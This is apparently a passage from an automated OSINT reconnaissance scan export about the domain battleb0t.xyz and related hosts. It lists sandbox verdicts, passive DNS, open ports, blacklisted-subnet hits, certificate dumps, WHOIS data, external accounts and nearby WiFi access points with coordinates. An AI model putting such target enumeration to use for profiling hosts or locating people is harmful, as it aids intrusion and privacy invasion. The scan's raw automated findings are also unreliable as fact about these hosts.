bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'c4919dc5ebcf054490c8ebabbb453b631c7d016ba87624dd98df4535c94ee593', u'type': None, u'type_short': u'url', u'size': 45}, {u'environment_id': 120, u'job_id': u'63865b7cd5844423476081fd', u'analysis_start_time': u'2022-11-29 19:20:28', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'ee2b3005a67dc45a60a0bc2947c2bfd8584632d9366ff2363f99250eefc18ee6', u'type': None, u'type_short': u'url', u'size': 56}, {u'environment_id': 100, u'job_id': u'63691cbfbd04344cc75ae66e', u'analysis_start_time': u'2022-11-07 14:57:08', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'a4dcbaef70e2a40e6e200c1f3e33731c8bcc05d0656e6b53524113e8a0df8004', u'type': None, u'type_short': u'url', u'size': 53}, {u'environment_id': 160, u'job_id': u'6363d7f1fc761c15c17b3308', u'analysis_start_time': u'2022-11-03 15:02:10', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'cb1af0d473361df7affbb056dab3ba4deda36972605d7a8818b296d8850e52ab', u'type': None, u'type_short': u'url', u'size': 449}, {u'environment_id': 120, u'job_id': u'635fd2ed62c55c3f0460c482', u'analysis_start_time': u'2022-10-31 13:51:41', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'e1453be443ffb2440c03ec5c4559ccdc7744e69609085ae83e1b439ba68cec0d', u'type': None, u'type_short': u'url', u'size': 48}, {u'environment_id': 100, u'job_id': u'6346255ebad57a03ce44a423', u'analysis_start_time': u'2022-10-12 02:24:31', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'19966b3c76496efd5b515e006c20819ecb6cc6bcb15a7d6f02e6d564b4569c85', u'type': None, u'type_short': u'url', u'size': 57}, {u'environment_id': 120, u'job_id': u'6345f449ab81ca2c01100ca1', u'analysis_start_time': u'2022-10-11 22:55:06', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'2a7999a7c7b888cb2de97ef77fd40b70d500bd4d0d867d53de57717906f536f9', u'type': None, u'type_short': u'url', u'size': 74}, {u'environment_id': 120, u'job_id': u'6345bb9d4e344208ff5110da', u'analysis_start_time': u'2022-10-11 19:00:12', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'fb77b9fcfedf278c3a95dd022207815d527f6c39672b7d4bb735ccbd564c337b', u'type': None, u'type_short': u'url', u'size': 56}, {u'environment_id': 120, u'job_id': u'633a92cd26ebeb4084237d30', u'analysis_start_time': u'2022-10-03 07:44:14', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': 7, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'8dd26fb9b49d59c44d246f236241a66f44894a96cfd88e6a51b7180ec3afee55', u'type': None, u'type_short': u'url', u'size': 49}, {u'environment_id': 120, u'job_id': u'63332d8bec4bc85429544603', u'analysis_start_time': u'2022-09-27 17:12:53', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'c20b1b9476c9a0c39fb1fc240a9a6ecbf8c3a621eb05076f858345e4ec1f0b24', u'type': None, u'type_short': u'url', u'size': 185}, {u'environment_id': 120, u'job_id': u'63331f1830e7574737082cf9', u'analysis_start_time': u'2022-09-27 16:04:41', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'46f1850d69d9ed2ce0e13a3f0876f7b6dc06be159fb8563ed16ad44e418f754f', u'type': None, u'type_short': u'url', u'size': 193}, {u'environment_id': 120, u'job_id': u'632af55f008c332beb442bb4', u'analysis_start_time': u'2022-09-21 11:28:32', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'8542bd5b44a22c5a1605485c1ad44055090c9b024aee2513be530a18da580c4a', u'type': None, u'type_short': u'url', u'size': 132}, {u'environment_id': 100, u'job_id': u'63232b151b9f1613672ee7c5', u'analysis_start_time': u'2022-09-15 13:39:33', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 60, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'08e9737057fea811f948925e9e391e1da7e9893d51f58b3c2456f5aca5abc1a7', u'type': None, u'type_short': u'url', u'size': 372}, {u'environment_id': 120, u'job_id': u'6318f2cc0b9d381dff465a33', u'analysis_start_time': u'2022-09-07 19:36:45', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'f47a058697e7bd050260e62793cca89181c3f1843751027258c6005091b1159d', u'type': None, u'type_short': u'url', u'size': 53}, {u'environment_id': 100, u'job_id': u'63177929f0d01a58c2105548', u'analysis_start_time': u'2022-09-06 16:45:30', u'vx_family': u'Phishing site', u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 65, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'87b8f7b4674362788c509a8a821d981fbff51ab940c3eda1f1cbc02229138ee8', u'type': None, u'type_short': u'url', u'size': 47}, {u'environment_id': 110, u'job_id': u'6316d4fc50da6f01af3cb1d0', u'analysis_start_time': u'2022-09-06 05:16:19', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 20, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'd9796c683320585298536aecefe2ad34708b28a0de252b6719fc83e2a25a530b', u'type': None, u'type_short': u'url', u'size': 53}, {u'environment_id': 120, u'job_id': u'63088b430ab94550560941eb', u'analysis_start_time': u'2022-08-26 08:58:44', u'vx_family': u'Phishing site', u'av_detect': u'6', u'environment_description': u'Windows 7 64 bit', u'threat_score': 22, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'8d65ee6c3d3e29e2405c7de07ca0dbc6a3c42dfa8e6cfd38e0d683284459d33f', u'type': None, u'type_short': u'url', u'size': 102}, {u'environment_id': 100, u'job_id': u'6302d05deed97532945a43e5', u'analysis_start_time': u'2022-08-22 00:39:58', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'8ac3981d435cc07e82b191674acb15ae73d9120856291dacd3943ecd8cbf55bb', u'type': None, u'type_short': u'url', u'size': 124}, {u'environment_id': 100, u'job_id': u'62ff4b4a0b68df64617ec3d6', u'analysis_start_time': u'2022-08-19 08:35:23', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'437da0e7d6ec04cb427020f0d05f83c1e0a2d1c225783f3c08a953cbd4f27546', u'type': None, u'type_short': u'url', u'size': 47}, {u'environment_id': 100, u'job_id': u'62ea9c33f156641b5137bc47', u'analysis_start_time': u'2022-08-03 16:03:00', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'783629b3e95b93b2d4a6ada0316b8a5e264452240f3a53e61173b93d3cc72fa7', u'type': None, u'type_short': u'url', u'size': 107}, {u'environment_id': 100, u'job_id': u'62e818500d4d2d35c053b80a', u'analysis_start_time': u'2022-08-01 18:15:45', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'75658c00df5f6a83875e4b4d0ee71200796b7814f2e0f7133b7af2c77f1f8d31', u'type': None, u'type_short': u'url', u'size': 125}, | 34.74.170.74 |
| 2023-05-12 02:50:30 | Physical Address | No | GLEIF | 2 | 0 | 3 | 0 | None | 14455 North Hayden Rd, Scottsdale, US-AZ, US, 85260 | GoDaddy.com, LLC |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet4862 (Net ID: 00:01:36:5B:48:60) | 37.780462,-122.390564 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | gunhome1 (Net ID: 00:09:5B:EE:D0:0E) | 39.0469, -77.4903 |
| 2023-05-12 03:01:10 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.122): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:23:40 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.15:8443 | 188.114.96.0/24 |
| 2023-05-12 03:01:09 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.120): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | BIGO Live (Category: gaming)
https://www.bigo.tv/user/login | login |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Demotywatory (Category: images)
https://demotywatory.pl/user/login | login |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/favicon.png | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:01:14 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.129): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:23:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.9:443 | 188.114.96.0/24 |
| 2023-05-12 02:53:20 | IP Address | No | Mnemonic PassiveDNS | 40 | 0 | 2 | 0 | None | 165.232.113.85 | kekw.battleb0t.xyz |
| 2023-05-12 02:47:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 185.199.110.153:80 | 185.199.110.153 |
| 2023-05-12 02:56:51 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:96:9b:29:e7:ba:1f:ed:f3:53:36:ca:2c:46:93:27:46:97
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 15:44:09 2022 GMT
Not After : Mar 13 15:44:08 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c5:26:42:72:54:54:74:21:1e:c0:7a:66:54:5a:
e8:26:8a:a7:bb:78:e0:52:09:b4:70:cd:bc:21:4b:
2c:77:39:63:f4:67:8f:19:31:3e:f0:0f:58:55:9d:
80:0d:29:74:7f:66:1f:df:6c:0f:e4:7c:f2:b1:63:
d3:73:4b:d0:8e:1c:94:d5:39:9f:87:08:c9:39:28:
06:18:ff:8b:b4:c8:13:46:ac:cf:6d:a5:8c:43:a0:
09:d6:74:e4:1b:e6:a1:90:6d:22:b3:ba:58:9d:f7:
79:37:55:b1:58:ef:15:cb:64:d0:30:b0:3c:9c:57:
0f:fe:6c:6b:bb:3f:27:84:33:78:b0:19:92:bf:97:
a6:0f:20:d5:97:af:a6:3b:9d:2c:b6:18:1b:80:b6:
fb:2e:b9:e7:44:40:3a:ab:de:d1:27:94:5c:98:f3:
69:c6:eb:0a:ba:59:dd:58:0a:8d:f7:6b:71:2d:96:
80:0b:9a:05:20:72:48:c7:59:11:c0:d5:98:a3:64:
8a:78:35:12:8b:20:64:de:10:73:21:62:d5:82:94:
42:92:41:f0:40:98:0d:fd:64:08:ef:ba:99:48:1d:
ae:86:bd:de:46:1e:c7:72:49:3d:93:76:b8:e9:ff:
0d:e2:5c:31:61:a9:f2:59:1c:92:cb:56:9f:9b:f7:
48:28:35:ef:e1:4f:ae:4c:d6:6f:39:80:a0:50:ab:
78:66:96:ff:8d:78:93:50:2d:b7:0a:ef:fe:70:44:
cf:d9:e4:4f:5e:34:97:d6:93:af:d9:54:30:40:86:
24:9c:59:46:7c:df:86:e9:5e:eb:17:7f:95:e4:0e:
70:f5:5a:35:d4:64:cb:b9:5b:5c:bb:45:e6:4e:80:
a3:6d:83:42:86:a4:44:3b:83:c2:1d:e2:02:99:d0:
36:4c:c3:91:eb:69:38:a7:7d:2f:35:65:33:3e:23:
0b:5d:1b:0c:01:a1:10:75:e2:ac:bb:3b:bf:f6:2f:
ec:4e:98:ec:53:ee:86:34:4c:69:d1:38:5c:a9:07:
72:79:62:64:81:ea:03:fc:2f:18:db:04:b6:04:36:
1d:bc:01:56:0e:d9:49:1c:dd:41:11:ce:34:13:0f:
13:81:d8:cd:71:a3:fc:76:2b:ea:14:1c:8d:38:63:
54:f1:73:9f:26:18:47:68:79:40:b9:a0:ac:b7:d2:
e0:a8:36:94:6f:0c:c3:56:34:6a:ee:a7:97:c4:d3:
0b:44:a3:56:87:d8:dc:ce:f3:89:8c:09:62:1a:25:
1f:dd:5f:2a:c0:d4:a9:14:4f:34:09:bc:53:d5:35:
be:6b:0d:6a:49:bf:0b:11:66:23:11:60:25:c5:db:
56:15:5d
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:E8:B3:AA:B6:B4:6A:08:8C:66:4E:1B:FC:F4:D4:C0:C8:AD:D7:A5
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
23:97:7b:03:b9:f4:a4:34:12:d3:21:3d:da:44:f5:20:c3:b1:
3b:ac:6b:d9:60:b8:b7:69:bb:7a:12:d5:25:8c:0f:00:de:f7:
36:a4:48:3c:17:0b:8b:18:53:7e:62:90:c7:ad:c4:3d:35:34:
7d:53:88:f9:54:65:04:22:df:53:b4:19:52:e4:bc:5e:0b:03:
2b:1e:62:32:2a:0c:d4:df:76:d7:3c:d0:ee:2e:d6:fe:2e:91:
01:8b:82:92:c3:06:53:df:e0:c5:5e:14:ca:21:52:f8:77:c2:
63:cb:6d:04:c8:e2:63:8d:d8:f2:81:13:be:86:29:78:4d:d3:
15:f3:e6:0d:45:f1:0a:26:81:2a:91:e1:c5:11:de:38:7b:0c:
cf:72:df:63:25:33:a6:15:a5:be:c2:1d:86:c1:1d:1c:dc:30:
fc:22:c3:9f:a9:fa:7c:dd:a4:c0:3b:50:98:18:64:aa:5a:5b:
60:a4:a5:3e:e0:2c:e4:d0:4b:8a:7e:bc:80:27:a1:5e:d2:25:
b1:27:e5:25:2c:1a:a2:db:28:f3:fa:2d:33:78:d3:45:4c:a4:
5f:a1:7f:85:be:04:d2:fe:95:ff:fd:b1:53:9f:47:43:cf:75:
33:c3:8e:7b:1a:d7:d7:ca:fd:b4:9d:e3:3d:6e:15:33:3e:ee:
1e:db:28:8f
|
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | untappd (Category: social)
https://untappd.com/user/login/ | login |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SpeedStream (Net ID: 00:01:24:F0:07:E7) | 37.7642, -122.3993 |
| 2023-05-12 03:12:51 | Physical Location | No | numverify | 0 | 0 | 3 | 0 | None | Moskva, RU | +74955801111 |
| 2023-05-12 02:50:17 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | vscode.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:56:b0:2c:f1:37:ec:4d:fb:ba:29:5b:fe:cf:08:f7:c5:d3
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:49:55 2023 GMT
Not After : Apr 27 17:49:54 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:cb:71:f4:b8:7c:a4:30:09:1b:13:75:c6:c3:49:
0a:5a:97:35:c2:e3:b5:90:5b:a3:b9:e0:c8:a4:e3:
37:7a:a6:7e:1b:38:a5:5a:63:ab:b5:eb:db:f5:ce:
46:28:9a:bb:61:30:d2:f6:61:59:c2:0e:37:b3:85:
32:eb:67:93:5c:a2:8a:68:ae:c7:6a:b0:d0:9f:fc:
8d:d5:3b:0a:5d:17:21:49:98:a5:cc:cd:89:42:87:
4d:54:69:c0:91:34:ff:12:c3:4c:10:fb:89:47:3a:
b3:b5:ed:cc:06:52:eb:16:7a:af:b4:c5:22:00:43:
aa:8d:8b:68:61:04:b5:6e:86:7d:6f:23:6e:79:15:
3b:96:1c:92:ea:d1:76:1a:98:eb:67:69:53:a7:00:
db:63:83:56:0b:fc:db:8c:00:6a:64:27:99:81:0c:
e0:c2:14:78:8e:45:d2:05:23:4b:2e:a1:d6:90:83:
3d:eb:f6:16:04:b9:30:78:89:df:df:c5:c0:a5:c5:
60:dc:2c:82:50:e1:50:fc:88:d4:46:2d:16:9d:dd:
14:56:c3:31:55:0c:b7:cc:40:45:d8:f9:22:11:f9:
ed:60:df:5c:2f:a8:5f:17:ac:ff:7d:8a:1e:77:a6:
e8:15:cb:e0:33:32:29:69:ca:42:d7:15:49:3f:d9:
68:31:ef:59:a1:4e:f5:94:c3:75:47:24:20:25:4f:
22:0f:35:ad:2a:db:20:f0:5d:b9:c7:a2:17:d1:f3:
52:80:77:94:64:66:0d:72:a2:bf:aa:b0:5e:b6:d9:
af:81:4d:54:fa:3e:6b:7d:a8:7b:0d:08:23:70:3b:
37:ad:2b:75:bf:91:06:70:7f:c1:79:93:83:08:8c:
9a:bf:f2:64:ef:2f:39:42:b9:84:35:4b:b0:83:66:
5e:d7:c5:a7:06:f4:b4:89:e9:41:d1:09:1f:c3:66:
18:da:ea:4b:2f:9a:1a:d0:a2:05:8c:af:7f:ec:ae:
0f:17:00:fd:78:c7:64:b6:db:0c:73:e7:03:66:b3:
9e:9f:74:ea:0a:b7:ba:41:3e:89:fa:49:d9:69:26:
3c:0e:bc:77:f5:9f:cd:1d:0b:77:59:ba:57:e5:96:
24:24:9a:52:56:4e:63:31:d7:70:db:dc:4b:70:cb:
90:cd:e2:20:14:b5:fa:25:1b:2d:3b:39:de:26:c5:
3e:2d:95:63:5f:d6:2a:ba:87:f1:7a:9d:cc:8d:4d:
e8:02:34:63:08:c3:8a:65:36:2f:3d:9b:90:77:71:
2a:cc:26:26:c5:ad:9e:d8:4e:fb:7a:b2:ec:5f:c7:
b5:9a:b3:86:c9:5c:88:b7:8c:c8:3d:30:64:42:7f:
87:9a:b5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:A0:A8:B9:3F:90:D7:08:DA:7E:1F:47:83:D5:88:5D:68:C9:9D:69
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
14:78:89:b1:8a:61:96:a7:ed:ed:6f:79:f8:42:dc:18:11:94:
04:56:a5:c3:80:ee:8b:7d:e8:18:f9:55:d6:f7:cb:22:5f:bd:
89:01:c5:e6:7b:ae:45:c0:ec:56:e5:c2:7d:d1:3d:a3:bc:46:
f2:97:64:eb:52:63:74:0b:62:2b:cb:f6:53:e6:8f:96:8f:78:
0e:79:d9:d9:06:eb:13:01:f3:a6:5e:da:6d:b3:53:66:1e:0a:
11:4d:63:47:ed:42:22:0b:9f:52:2c:e1:d2:d2:7f:fc:df:0d:
ec:bd:d7:45:bd:1e:e8:50:83:90:59:00:5f:f9:13:d7:1e:8d:
09:80:4c:9f:8f:d6:56:72:42:52:f1:4f:c9:f7:1a:c8:c6:d7:
cc:26:6b:04:0a:fd:ec:68:27:dd:6a:5c:a7:6a:ec:f5:60:49:
d4:f0:de:24:04:3b:b8:7c:8c:60:f2:a3:cc:8f:46:9a:ab:ff:
28:cf:36:42:ed:1a:c4:05:86:b0:92:1e:51:f1:3e:c1:54:5f:
a0:77:3a:81:f2:18:31:c6:f3:7b:7d:43:34:56:f8:32:e5:fc:
0e:7a:dd:40:27:84:9e:db:87:8b:98:6d:7c:97:c3:31:5e:a7:
d9:88:62:36:ed:94:00:e5:a5:27:77:53:25:24:2b:3e:9f:cd:
c9:43:c1:d8
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | linksys-n (Net ID: 00:00:85:EB:4B:63) | 41.8781, -87.6298 |
| 2023-05-12 03:03:47 | Co-Hosted Site | No | ThreatMiner | 2 | 0 | 2 | 0 | None | akashpmani.github.io | 185.199.111.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <hidden ssid> (Net ID: 00:01:E3:54:E7:17) | 52.3759, 4.8975 |
| 2023-05-12 03:03:39 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0101.github.io |
| 2023-05-12 03:03:16 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cpcontacts.ayhu.xyz | [{u'not_after': u'2023-07-10T04:54:49', u'not_before': u'2023-04-11T04:54:50', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0d408dd97ca1bd4c0d06c53fc3e92ebc', u'entry_timestamp': u'2023-04-11T05:54:51.221', u'id': 9117673170}, {u'not_after': u'2023-05-12T05:22:09', u'not_before': u'2023-02-11T05:22:10', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0ce3f41ce8cbbbcf13f76c6f365ec2eb', u'entry_timestamp': u'2023-02-11T06:22:11.299', u'id': 8627857885}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.333', u'id': 8209207679}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.07', u'id': 8196466589}, {u'not_after': u'2023-03-14T04:12:06', u'not_before': u'2022-12-14T04:12:07', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'00ff0e1ea46f55f0740eb383e107c9ea93', u'entry_timestamp': u'2022-12-14T05:12:08.377', u'id': 8196466213}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:55.433', u'id': 8209126729}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:54.573', u'id': 8196005223}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:55.143', u'id': 8206782905}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:54.437', u'id': 8193169403}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.931', u'id': 8206381262}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.083', u'id': 8192906588}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.988', u'id': 8206326761}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.756', u'id': 8193180831}] |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | GoDaddy.com, LLC | Domain Name: AMCODEV.ME
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2023-01-03T11:02:11Z
Creation Date: 2018-01-02T22:12:38Z
